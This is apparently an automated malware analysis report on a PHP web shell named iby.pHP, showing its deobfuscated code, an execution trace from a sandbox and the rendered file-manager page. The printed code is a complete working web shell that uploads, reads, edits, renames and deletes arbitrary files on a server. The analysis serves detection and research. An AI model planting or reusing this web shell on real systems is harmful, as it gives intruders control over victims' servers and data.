iby.pHP

md5: 9de25af1adaabd4b55b3cde8bbe37917

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
error_reporting (Deobfuscated, Original, Traces)
getcwd (Deobfuscated, Original, Traces)
php_uname (Deobfuscated, Original, Traces)
set_time_limit (Deobfuscated, Original, Traces)

Files
copy (Deobfuscated, Original)
file_get_contents (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Title
KonTOL (Original)

URLs
https://www.e-get.com.tw/icons/folder.gif (Deobfuscated)
https://www.e-get.com.tw/icons/text.gif (Deobfuscated, HTML)

Deobfuscated PHP code
<title>KonTOL</title>
<?php 
set_time_limit(0);
error_reporting(0);
echo "\r\n<!DOCTYPE html><html>\r\n<head>\r\n<title>index of " . getcwd() . "</title>\r\n<style>\r\na{\r\ncolor:black;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor: white;\r\ntext-shadow:0px 0px 6px #000;\r\n}\r\n\r\n</style>\r\n</head><body> ";
if (isset($_GET["path"])) {
    $N_N_d = $_GET["path"];
    chdir($_GET["path"]);
    goto Y539P;
}
$N_N_d = getcwd();
Y539P:
$N_N_d = str_replace("\\", "/", $N_N_d);
$xVxO3 = explode("/", $N_N_d);
echo "<h1><a href='?'>index of ";
foreach ($xVxO3 as $mV34m => $Z7H8K) {
    echo "<a href='?path=";
    $rEHna = 0;
    KrTWs:
    if (!($rEHna <= $mV34m)) {
        echo "'>{$Z7H8K}</a>/";
    }
    echo $xVxO3[$rEHna];
    if (!($rEHna != $mV34m)) {
        goto Dd1T2;
    }
    echo "/";
    Dd1T2:
    $rEHna++;
    goto KrTWs;
}
echo "</font></td></h1><td width=\"27%\">\r\n<form enctype=\"multipart/form-data\" method=\"POST\">\r\n\t<input type=\"file\" name=\"file\"/>\r\n\t<input type=\"submit\" value=\"Upload\" />\r\n</form>\r\n</td></tr><tr><td colspan=\"2\">";
if (!isset($_FILES["file"])) {
    goto C1dT8;
}
if (copy($_FILES["file"]["tmp_name"], $N_N_d . "/" . $_FILES["file"]["name"])) {
    echo "<font color=\"#05B640\">Upload OK!</font><br/>";
    goto HALNn;
}
echo "<font color=\"white\">Upload Failed!</font><br/>";
HALNn:
C1dT8:
if (isset($_GET["filesrc"])) {
    echo "<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"\"><tr><td>File: ";
    echo '' . $N_N_d . "/" . basename($_GET["filesrc"]);
    '';
    echo "</tr></td></table><br />";
    echo "<textarea wrap=off cols=140 rows=50 readonly=''>" . htmlspecialchars(file_get_contents($_GET["filesrc"])) . "</textarea>";
    goto g1jtp;
}
if (isset($_GET["option"]) && $_POST["opt"] != "delete") {
    echo "</table><br />" . $_POST["path"] . "<br /><br />";
    if ($_POST["opt"] == "rename") {
        if (!isset($_POST["newname"])) {
            goto IoaCJ;
        }
        if (rename($_POST["path"], $N_N_d . "/" . $_POST["newname"])) {
            echo "<font color=\"#05B640\">Rename OK!</font><br />";
            goto xdJwG;
        }
        echo "<font color=\"white\">Rename Failed!</font><br />";
        xdJwG:
        $_POST["name"] = $_POST["newname"];
        IoaCJ:
        echo "<form method=\"POST\">New Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"" . $_POST["name"] . "\" /><input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\"><input type=\"hidden\" name=\"opt\" value=\"rename\"><input type=\"submit\" value=\"Go\" /></form>";
        goto d7HoN;
    }
    if ($_POST["opt"] == "edit") {
        if (!isset($_POST["src"])) {
            goto jO7hG;
        }
        $ctqDJ = fopen($_POST["path"], "w");
        if (fwrite($ctqDJ, $_POST["src"])) {
            echo "<font color=\"#05B640\">Edit File OK!</font><br />";
            goto Xz2jP;
        }
        echo "<font color=\"white\">Edit File Failed!</font><br />";
        Xz2jP:
        fclose($ctqDJ);
        jO7hG:
        echo "<form method=\"POST\"><textarea wrap=\"off\" cols=140 rows=50 name=\"src\">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br /><input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\"><input type=\"hidden\" name=\"opt\" value=\"edit\"><input type=\"submit\" value=\"Go\" /></form>";
        goto el7ld;
    }
    el7ld:
    d7HoN:
    echo "";
    goto eXV_n;
}
echo "</table><br />";
if (!(isset($_GET["option"]) && $_POST["opt"] == "delete")) {
    goto i9Z9s;
}
if ($_POST["type"] == "dir") {
    if (rmdir($_POST["path"])) {
        echo "<font color=\"#05B640\">Dir Deleted!</font><br />";
        goto fedG4;
    }
    echo "<font color=\"white\">Delete Dir Failed!</font><br />";
    fedG4:
    goto e9Ajt;
}
if ($_POST["type"] == "file") {
    if (unlink($_POST["path"])) {
        echo "<font color=\"#05B640\">Delete File Done!</font><br />";
        goto HL3p0;
    }
    echo "<font color=\"white\">Delete File Error!</font><br />";
    HL3p0:
    goto jSesb;
}
jSesb:
e9Ajt:
i9Z9s:
echo "";
$Ti2jx = scandir($N_N_d);
echo "<div>\r\n<table border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"\">\r\n<tr>\r\n<th>Name</th>\r\n<th>Last modified</th>\r\n<th>Permissions</th>\r\n<th>Size</th>\r\n<th>Options</th>\r\n<tr><th colspan=\"5\"><hr></th></tr>\r\n</tr>";
foreach ($Ti2jx as $ljzHe) {
    if (!(!is_dir("{$N_N_d}/{$ljzHe}") || $ljzHe == "." || $ljzHe == "..")) {
        echo "\r\n\t<tr>\r\n\t<td><img src='https://www.e-get.com.tw/icons/folder.gif'> <a href=\"?path={$N_N_d}/{$ljzHe}\">{$ljzHe}</a></td><td align=center>" . date("d-m-y H:i", filemtime("{$N_N_d}/{$fuEss}")) . "</td><td align=center>";
        if (is_writable("{$N_N_d}/{$ljzHe}")) {
            echo "<font color=\"#05B640\">";
            goto kxoGo;
        }
        if (!is_readable("{$N_N_d}/{$ljzHe}")) {
            echo "<font color=\"white\">";
            goto cujV0;
        }
        cujV0:
        kxoGo:
        echo KoHcU("{$N_N_d}/{$ljzHe}");
        if (!(is_writable("{$N_N_d}/{$ljzHe}") || !is_readable("{$N_N_d}/{$ljzHe}"))) {
            goto ZeBDQ;
        }
        echo "</font>";
        ZeBDQ:
        echo "</td><td align=center>--";
        echo "</td>\r\n\t<td><form method=\"POST\" action=\"?option&path={$N_N_d}\">\r\n\t<select name=\"opt\">\r\n\t<option value=\"\">select</option>\r\n\t<option value=\"delete\">Delete</option>\r\n\t<option value=\"rename\">Rename</option>\r\n\t</select>\r\n\t<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n\t<input type=\"hidden\" name=\"name\" value=\"{$ljzHe}\">\r\n\t<input type=\"hidden\" name=\"path\" value=\"{$N_N_d}/{$ljzHe}\">\r\n\t<input type=\"submit\" value=\">\" /></form></td></tr>";
        goto qR7Sh;
    }
    qR7Sh:
}
foreach ($Ti2jx as $fuEss) {
    if (is_file("{$N_N_d}/{$fuEss}")) {
        $oiJyR = filesize("{$N_N_d}/{$fuEss}") / 1024;
        $oiJyR = round($oiJyR, 3);
        if ($oiJyR >= 1024) {
            $oiJyR = round($oiJyR / 1024, 2) . " MB";
            goto NnUY0;
        }
        $oiJyR .= " KB";
        NnUY0:
        echo "\r\n\t<tr>\r\n\t<td><img src='https://www.e-get.com.tw/icons/text.gif'> <a href=\"?filesrc={$N_N_d}/{$fuEss}&path={$N_N_d}\">{$fuEss}</a></td>\r\n\t<td align=center>" . date("d-m-y H:i", filemtime("{$N_N_d}/{$fuEss}")) . "</td>\r\n\t<td align=center>";
        if (is_writable("{$N_N_d}/{$fuEss}")) {
            echo "<font color=\"#05B640\">";
            goto FRUxV;
        }
        if (!is_readable("{$N_N_d}/{$fuEss}")) {
            echo "<font color=\"white\">";
            goto K35wW;
        }
        K35wW:
        FRUxV:
        echo kOHCU("{$N_N_d}/{$fuEss}");
        if (!(is_writable("{$N_N_d}/{$fuEss}") || !is_readable("{$N_N_d}/{$fuEss}"))) {
            goto XYe_Q;
        }
        echo "</font>";
        XYe_Q:
        echo "</td>\r\n\t<td align=center>" . $oiJyR . '';
        echo "</td>\r\n\t<td>\r\n\t<form method=\"POST\" action=\"?option&path={$N_N_d}\">\r\n\t<select name=\"opt\">\r\n\t<option value=\"\">select</option>\r\n\t<option value=\"delete\">Delete</option>\r\n\t<option value=\"rename\">Rename</option>\r\n\t<option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"{$fuEss}\"><input type=\"hidden\" name=\"path\" value=\"{$N_N_d}/{$fuEss}\"><input type=\"submit\" value=\">\" /></form></td></tr>";
        goto lO9KR;
    }
    lO9KR:
}
echo "<tr><th colspan=\"5\"><hr></th></tr></table><h4><code>" . php_uname() . " | ev4nXploit</h4></code>";
eXV_n:
g1jtp:
echo "</body></html>";
function koHcU($fuEss)
{
    $pJe0L = fileperms($fuEss);
    if (($pJe0L & 0xc000) == 0xc000) {
        $rLXSy = "s";
        goto cD7xG;
    }
    if (($pJe0L & 0xa000) == 0xa000) {
        $rLXSy = "l";
        goto cD7xG;
    }
    if (($pJe0L & 0x8000) == 0x8000) {
        $rLXSy = "-";
        goto cD7xG;
    }
    if (($pJe0L & 0x6000) == 0x6000) {
        $rLXSy = "b";
        goto cD7xG;
    }
    if (($pJe0L & 0x4000) == 0x4000) {
        $rLXSy = "d";
        goto cD7xG;
    }
    if (($pJe0L & 0x2000) == 0x2000) {
        $rLXSy = "c";
        goto cD7xG;
    }
    if (($pJe0L & 0x1000) == 0x1000) {
        $rLXSy = "p";
        goto GgaRh;
    }
    $rLXSy = "u";
    GgaRh:
    cD7xG:
    $rLXSy .= $pJe0L & 0x100 ? "r" : "-";
    $rLXSy .= $pJe0L & 0x80 ? "w" : "-";
    $rLXSy .= $pJe0L & 0x40 ? $pJe0L & 0x800 ? "s" : "x" : ($pJe0L & 0x800 ? "S" : "-");
    $rLXSy .= $pJe0L & 0x20 ? "r" : "-";
    $rLXSy .= $pJe0L & 0x10 ? "w" : "-";
    $rLXSy .= $pJe0L & 0x8 ? $pJe0L & 0x400 ? "s" : "x" : ($pJe0L & 0x400 ? "S" : "-");
    $rLXSy .= $pJe0L & 0x4 ? "r" : "-";
    $rLXSy .= $pJe0L & 0x2 ? "w" : "-";
    $rLXSy .= $pJe0L & 0x1 ? $pJe0L & 0x200 ? "t" : "x" : ($pJe0L & 0x200 ? "T" : "-");
    return $rLXSy;
}
Execution traces
data/traces/9de25af1adaabd4b55b3cde8bbe37917_trace-1676255583.6483.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:33:29.546111]
1	0	1	0.000141	393512
1	3	0	0.000714	475776	{main}	1		/var/www/html/uploads/iby.pHP	0	0
2	4	0	0.000732	475776	set_time_limit	0		/var/www/html/uploads/iby.pHP	2	1	0
2	4	1	0.000750	475840
2	4	R			FALSE
2	5	0	0.000764	475808	error_reporting	0		/var/www/html/uploads/iby.pHP	2	1	0
2	5	1	0.000776	475848
2	5	R			22527
2	6	0	0.000789	475808	getcwd	0		/var/www/html/uploads/iby.pHP	2	0
2	6	1	0.000802	475856
2	6	R			'/var/www/html/uploads'
2	7	0	0.000818	475808	getcwd	0		/var/www/html/uploads/iby.pHP	2	0
2	7	1	0.000830	475856
2	7	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/iby.pHP	2	$N_N_d = '/var/www/html/uploads'
2	8	0	0.000857	475856	str_replace	0		/var/www/html/uploads/iby.pHP	2	3	'\\'	'/'	'/var/www/html/uploads'
2	8	1	0.000872	475952
2	8	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/iby.pHP	2	$N_N_d = '/var/www/html/uploads'
2	9	0	0.000895	475856	explode	0		/var/www/html/uploads/iby.pHP	2	2	'/'	'/var/www/html/uploads'
2	9	1	0.000909	476432
2	9	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/iby.pHP	2	$xVxO3 = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/iby.pHP	2	$mV34m = 0
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna = 0
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$mV34m = 1
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna = 0
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$mV34m = 2
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna = 0
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$mV34m = 3
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna = 0
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$mV34m = 4
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna = 0
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
1		A						/var/www/html/uploads/iby.pHP	2	$rEHna++
2	10	0	0.001166	476360	scandir	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads'
2	10	1	0.001196	476976
2	10	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'iby.pHP', 5 => 'prepend.php']
1		A						/var/www/html/uploads/iby.pHP	2	$Ti2jx = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'iby.pHP', 5 => 'prepend.php']
2	11	0	0.001234	476992	is_dir	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.'
2	11	1	0.001249	477056
2	11	R			TRUE
2	12	0	0.001263	477024	is_dir	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/..'
2	12	1	0.001277	477072
2	12	R			TRUE
2	13	0	0.001289	477032	is_dir	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.htaccess'
2	13	1	0.001303	477072
2	13	R			FALSE
2	14	0	0.001317	477032	is_dir	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/data'
2	14	1	0.001330	477072
2	14	R			TRUE
2	15	0	0.001344	477216	filemtime	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/'
2	15	1	0.001358	477248
2	15	R			1676255583
2	16	0	0.001371	477160	date	0		/var/www/html/uploads/iby.pHP	2	2	'd-m-y H:i'	1676255583
2	16	1	0.001424	479552
2	16	R			'12-02-23 21:33'
2	17	0	0.001442	479088	is_writable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/data'
2	17	1	0.001458	479128
2	17	R			TRUE
2	18	0	0.001472	479088	koHcU	1		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/data'
3	19	0	0.001484	479088	fileperms	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/data'
3	19	1	0.001498	479136
3	19	R			16895
2		A						/var/www/html/uploads/iby.pHP	2	$pJe0L = 16895
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy = 'd'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'w'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'x'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'w'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'x'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'w'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'x'
2	18	1	0.001620	479136
2	18	R			'drwxrwxrwx'
2	20	0	0.001634	479096	is_writable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/data'
2	20	1	0.001649	479136
2	20	R			TRUE
2	21	0	0.001663	479096	is_dir	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/iby.pHP'
2	21	1	0.001677	479136
2	21	R			FALSE
2	22	0	0.001690	479104	is_dir	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/prepend.php'
2	22	1	0.001704	479152
2	22	R			FALSE
2	23	0	0.001717	479096	is_file	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.'
2	23	1	0.001730	479120
2	23	R			FALSE
2	24	0	0.001743	479088	is_file	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/..'
2	24	1	0.001808	479136
2	24	R			FALSE
2	25	0	0.001825	479096	is_file	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.htaccess'
2	25	1	0.001840	479136
2	25	R			TRUE
2	26	0	0.001853	479096	filesize	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.htaccess'
2	26	1	0.001865	479136
2	26	R			64
1		A						/var/www/html/uploads/iby.pHP	2	$oiJyR = 0.0625
2	27	0	0.001890	479040	round	0		/var/www/html/uploads/iby.pHP	2	2	0.0625	3
2	27	1	0.001903	479112
2	27	R			0.063
1		A						/var/www/html/uploads/iby.pHP	2	$oiJyR = 0.063
1		A						/var/www/html/uploads/iby.pHP	2	$oiJyR = '0.063 KB'
2	28	0	0.001938	479360	filemtime	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.htaccess'
2	28	1	0.001950	479400
2	28	R			1676255583
2	29	0	0.001962	479304	date	0		/var/www/html/uploads/iby.pHP	2	2	'd-m-y H:i'	1676255583
2	29	1	0.001993	479632
2	29	R			'12-02-23 21:33'
2	30	0	0.002007	479136	is_writable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.htaccess'
2	30	1	0.002023	479176
2	30	R			FALSE
2	31	0	0.002036	479136	is_readable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.htaccess'
2	31	1	0.002050	479176
2	31	R			TRUE
2	32	0	0.002063	479136	koHcU	1		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.htaccess'
3	33	0	0.002076	479136	fileperms	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.htaccess'
3	33	1	0.002087	479176
3	33	R			33188
2		A						/var/www/html/uploads/iby.pHP	2	$pJe0L = 33188
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy = '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'w'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= '-'
2	32	1	0.002201	479176
2	32	R			'-rw-r--r--'
2	34	0	0.002215	479136	is_writable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.htaccess'
2	34	1	0.002230	479176
2	34	R			FALSE
2	35	0	0.002242	479136	is_readable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/.htaccess'
2	35	1	0.002256	479176
2	35	R			TRUE
2	36	0	0.002271	479136	is_file	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/data'
2	36	1	0.002285	479176
2	36	R			FALSE
2	37	0	0.002298	479136	is_file	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/iby.pHP'
2	37	1	0.002312	479176
2	37	R			TRUE
2	38	0	0.002324	479136	filesize	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/iby.pHP'
2	38	1	0.002336	479176
2	38	R			21300
1		A						/var/www/html/uploads/iby.pHP	2	$oiJyR = 20.80078125
2	39	0	0.002367	479040	round	0		/var/www/html/uploads/iby.pHP	2	2	20.80078125	3
2	39	1	0.002390	479112
2	39	R			20.801
1		A						/var/www/html/uploads/iby.pHP	2	$oiJyR = 20.801
1		A						/var/www/html/uploads/iby.pHP	2	$oiJyR = '20.801 KB'
2	40	0	0.002426	479360	filemtime	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/iby.pHP'
2	40	1	0.002438	479400
2	40	R			1676255583
2	41	0	0.002451	479304	date	0		/var/www/html/uploads/iby.pHP	2	2	'd-m-y H:i'	1676255583
2	41	1	0.002481	479632
2	41	R			'12-02-23 21:33'
2	42	0	0.002495	479136	is_writable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/iby.pHP'
2	42	1	0.002510	479176
2	42	R			FALSE
2	43	0	0.002522	479136	is_readable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/iby.pHP'
2	43	1	0.002536	479176
2	43	R			TRUE
2	44	0	0.002549	479136	koHcU	1		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/iby.pHP'
3	45	0	0.002561	479136	fileperms	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/iby.pHP'
3	45	1	0.002573	479176
3	45	R			33204
2		A						/var/www/html/uploads/iby.pHP	2	$pJe0L = 33204
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy = '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'w'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'w'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= '-'
2	44	1	0.002686	479176
2	44	R			'-rw-rw-r--'
2	46	0	0.002700	479136	is_writable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/iby.pHP'
2	46	1	0.002713	479176
2	46	R			FALSE
2	47	0	0.002726	479136	is_readable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/iby.pHP'
2	47	1	0.002740	479176
2	47	R			TRUE
2	48	0	0.002754	479144	is_file	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/prepend.php'
2	48	1	0.002769	479192
2	48	R			TRUE
2	49	0	0.002781	479152	filesize	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/prepend.php'
2	49	1	0.002793	479192
2	49	R			57
1		A						/var/www/html/uploads/iby.pHP	2	$oiJyR = 0.0556640625
2	50	0	0.002816	479048	round	0		/var/www/html/uploads/iby.pHP	2	2	0.0556640625	3
2	50	1	0.002828	479120
2	50	R			0.056
1		A						/var/www/html/uploads/iby.pHP	2	$oiJyR = 0.056
1		A						/var/www/html/uploads/iby.pHP	2	$oiJyR = '0.056 KB'
2	51	0	0.002864	479376	filemtime	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/prepend.php'
2	51	1	0.002877	479416
2	51	R			1676255583
2	52	0	0.002890	479312	date	0		/var/www/html/uploads/iby.pHP	2	2	'd-m-y H:i'	1676255583
2	52	1	0.002919	479640
2	52	R			'12-02-23 21:33'
2	53	0	0.002933	479152	is_writable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/prepend.php'
2	53	1	0.002947	479192
2	53	R			FALSE
2	54	0	0.002960	479152	is_readable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/prepend.php'
2	54	1	0.002973	479192
2	54	R			TRUE
2	55	0	0.002986	479152	koHcU	1		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/prepend.php'
3	56	0	0.002998	479152	fileperms	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/prepend.php'
3	56	1	0.003011	479192
3	56	R			33261
2		A						/var/www/html/uploads/iby.pHP	2	$pJe0L = 33261
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy = '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'w'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'x'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'x'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'r'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= '-'
2		A						/var/www/html/uploads/iby.pHP	2	$rLXSy .= 'x'
2	55	1	0.003128	479192
2	55	R			'-rwxr-xr-x'
2	57	0	0.003142	479152	is_writable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/prepend.php'
2	57	1	0.003158	479192
2	57	R			FALSE
2	58	0	0.003170	479152	is_readable	0		/var/www/html/uploads/iby.pHP	2	1	'/var/www/html/uploads/prepend.php'
2	58	1	0.003184	479192
2	58	R			TRUE
2	59	0	0.003199	479088	php_uname	0		/var/www/html/uploads/iby.pHP	2	0
2	59	1	0.003211	479200
2	59	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.003231	479088
			0.003266	331304
TRACE END   [2023-02-13 00:33:29.549262]

Generated HTML code
<html><head><title>KonTOL</title>



<title>index of /var/www/html</title>
<style>
a{
color:black;
text-decoration: none;
}
a:hover{
color: white;
text-shadow:0px 0px 6px #000;
}

</style>
</head><body> <h1><a href="?">index of </a><a href="?path="></a>/<a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</h1>
<form enctype="multipart/form-data" method="POST">
	<input type="file" name="file">
	<input type="submit" value="Upload">
</form>
<br><div>
<table border="0" cellpadding="3" cellspacing="1" align="">
<tbody><tr>
<th>Name</th>
<th>Last modified</th>
<th>Permissions</th>
<th>Size</th>
<th>Options</th>
</tr><tr><th colspan="5"><hr></th></tr>

	<tr>
	<td><img src="https://www.e-get.com.tw/icons/text.gif"> <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td>
	<td align="center">12-02-23 21:32</td>
	<td align="center">-rw-r--r--</td>
	<td align="center">0 KB</td>
	<td>
	<form method="POST" action="?option&amp;path=/var/www/html">
	<select name="opt">
	<option value="">select</option>
	<option value="delete">Delete</option>
	<option value="rename">Rename</option>
	<option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis"><input type="submit" value=">"></form></td></tr>
	<tr>
	<td><img src="https://www.e-get.com.tw/icons/text.gif"> <a href="?filesrc=/var/www/html/iby.pHP&amp;path=/var/www/html">iby.pHP</a></td>
	<td align="center">12-02-23 21:32</td>
	<td align="center">-rw-rw-r--</td>
	<td align="center">20.801 KB</td>
	<td>
	<form method="POST" action="?option&amp;path=/var/www/html">
	<select name="opt">
	<option value="">select</option>
	<option value="delete">Delete</option>
	<option value="rename">Rename</option>
	<option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="iby.pHP"><input type="hidden" name="path" value="/var/www/html/iby.pHP"><input type="submit" value=">"></form></td></tr><tr><th colspan="5"><hr></th></tr></tbody></table><h4><code>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 | ev4nXploit</code></h4></div></body></html>
Original PHP code
<title>KonTOL</title>
